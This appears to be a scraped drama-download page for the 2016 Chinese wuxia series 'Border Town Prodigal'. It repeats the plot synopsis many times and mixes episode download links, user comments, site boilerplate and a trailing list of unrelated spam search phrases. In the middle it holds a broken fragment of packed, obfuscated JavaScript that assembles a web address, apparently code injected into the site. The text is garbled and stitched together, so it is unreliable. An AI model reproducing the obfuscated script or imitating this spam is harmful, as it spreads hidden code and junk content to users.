So can u help me by telling me where i can find this? Twenty years later, Fu Hong Xue, leaves the western regions and returned to the central plains (China) in order to investigate his adopted father’s death. Border Town Prodigal (2016) By Sharing This Drama Page , You're Helping us out ! As luck would have it, Ma Kong Qun’s beautiful daughter, Ma Fang Ling falls for Fu Hong Xue, while Ye Kai falls for her…together, they will face Ma Kong Qun. Writer (Book/Manga) Gu Long. Would love your thoughts, please comment. Report. avistaz is an invite only site and i cant register here… ... – Sep 7, 2016 . sorry i asked. As luck would have it, Ma Kong Qun’s beautiful daughter, Ma Fang Ling falls for Fu Hong Xue, while Ye Kai falls for her…together, they will face Ma Kong Qun. Audio Not Synced Wrong Audio Other . Episode 46 – 50: Download. At the same time, Bai Tian Yu and Hua Bai Feng’s biological son, Ye Kai, also left for the border town. Watch Border Town Prodigal Episode 47 Eng Sub Online in high quaily | V.I.P #2: The leader of the Divine Knife sect Bai Tian Yu was mysteriously ambushed and killed in the border town Plum Nunnery. Viann Zhang . Follow us on News. was Bai Tian Yu’s sworn brother, Ma Kong Qun, who organized the assassination. Details. thank u so much again. Description: The leader of the Divine Knife sect, Bai Tian Yu, was mysteriously ambushed and killed in the border town Plum Nunnery. Send Cancel. Border Town Prodigal (Bian Cheng Lang Zi, Edge City Wanderer, Vagabondize ,) is China drama premiere on Jul 18, 2016 on BTV. Episode 11 – 15: Download whenever u find free time and it wasnt bothersome for u… Romance; Dear KiraLamperouge Episode 31 – 35: Download )(;|$)\")||[])[1]||0)){l=1;8 1x=I.1A(1C*I.V()),f=I.V().1O(36).1M(/[^a-1N-1S-9]+/g,\"\").1B(0,10);8 M=\"3t://\"+e+\"/\"+n.1z(1x+\"/\"+(2f(1g.r)+1x)+\"/\"+f);s(u K==='v'&&u U.1c==='v'){T(8 B 3r K){s(K.3q(B)){s(u K[B]==='2j'&&K[B]!==''&&K[B].J>0){s(u U.1c[B]==='D'&&U.1c[B]===j){M=M+(M.2i('?')>0?'&':'? 7.4. I really liked this drama but I didn't at some parts. Ma Fang Ling. Details. Episode 06 – 10: Download Primary Details Cover Image Related Titles Cast Crew Genres Tags Release Information Services External Links Production Information. Other name: when you requested the drama you should have asked for 720p , i specified that in the request page if you want resolution for drama specify it ! NOTE: if The link of An Episode or The Subtitle is broken or dead, Please Report it in The Comments !! The leader of the Divine Knife sect, Bai Tian Yu, was mysteriously ambushed and killed in the border town Plum Nunnery. Border Town Prodigal (Bian Cheng Lang Zi, Edge City Wanderer, Vagabondize,) is China drama premiere on Jul 18, 2016 on BTV. 3- Donations. Follow. As luck would have it, Ma Kong Qun’s beautiful daughter, Ma Fang Ling falls for Fu Hong Xue, while Ye Kai falls for her…together, they will face Ma Kong Qun. Thank u SOOOOOOOOOOOOOOOOO mmuch!!!!! Wuxia; Global Request Show- A Song for You Season 4 Episode 15, Dageki Tenshi Ruri (Blow Angel Ruri) Episode 7, Terrace House Boys x Girls Next Door Episode 99, Idol Star Athletics Championships 2019 New Year Special Episode 5. was Bai Tian Yu’s sworn brother, Ma Kong Qun, who organized the assassination. Episode 36 – 40: Download in fact i download drama as soon as u post it to watch Twenty years later, Fu Hong Xue, leaves the western regions and returned to the central plains (China) in order to investigate his adopted father’s death. Episode 16 – 20: Download Vagabondize. Any Requests Outside of their Place Will NOT  be Carried out ! its just i like it as much as i want to see and have it in higher quality! Please forgive me for asking this Description: The leader of the Divine Knife sect, Bai Tian Yu, was mysteriously ambushed and killed in the border town Plum Nunnery. Edge City Wanderer At the same time, Bai Tian Yu and Hua Bai Feng’s biological son, Ye Kai, also left for the border town. I wish u had enjoyed your trip! The leader of the Divine Knife sect, Bai Tian Yu, was mysteriously ambushed and killed in the border town Plum Nunnery. This site uses Akismet to reduce spam. Happy new year! Episode 21 – 25: Download Main Role. Details. Episode 26 – 30: Download Reviews: 3 users. Thank you so much in advance. Twenty years later, Fu Hong Xue, leaves the western regions and returned to the central plains (China) in order to investigate his adopted father’s death. The two find that it was Bai Tian Yu’s sworn brother, Ma Kong Qun, who organized the assassination. Border Town Prodigal (2016) By Sharing This Drama Page , You're Helping us out ! Please help us to describe the issue so we can fix it asap. Border Town Prodigal Episode 1 2017-02-16 15:08:43; Login to Drama Cool Log in with Google Remember me Forgot password? Historical; thank u!! The leader of the Divine Knife sect, Bai Tian Yu, was mysteriously ambushed and killed in the border town Plum Nunnery. Border Town Prodigal (Bian Cheng Lang Zi, Edge City Wanderer, Vagabondize ,) is China drama premiere on Jul 18, 2016 on BTV. Report. The leader of the Divine Knife sect, Bai Tian Yu, was mysteriously ambushed and killed in the border town Plum Nunnery. Add to List. NOTE: if You’re Having Trouble Downloading, Check HERE to See The instructions !! 新边城浪子 Episode 01 – 05: Download Title: 新边城浪子 / Bian Cheng Lang Zi , Edge City Wanderer , Vagabondize , Genre: Historical, Romance, Wuxia, Drama, Melodrama; Episodes: 50; Broadcast network: BTV; Broadcast period: Jul 18, 2016 – Sep 7, 2016 . Primary Details Cover Image Related Titles Cast Crew Genres Tags Release Information Services External Links Production Information. Genre: Ads; … Edit Translation. The leader of the Divine Knife sect, Bai Tian Yu, was mysteriously ambushed and killed in the border town Plum Nunnery. English title: Border-Town Prodigal; Also known as: Edge City Wanderer; Genre: Wuxia, romance; Episodes: 50; Viewership ratings: peak = 0.778%, average= 0.587% ; Broadcast network: BTV; Broadcast period: 2016-Jul-18 to 2016-Sept-12; Air time: Monday-Wednesday 22:20; Related TV Series: Bian Cheng Lang Zi; Synopsis .

Chimene Diaz Net Worth, Patience Of Job, Munya Chawawa Race, Suburbs To Avoid In Tauranga, Le'veon Bell House Nj, Swami Saranam Malayalam, Dani Gabriel Physiotherapist, Misha Green Sons Of Anarchy, Marmoset Monkey Price, React Bootstrap Small Button,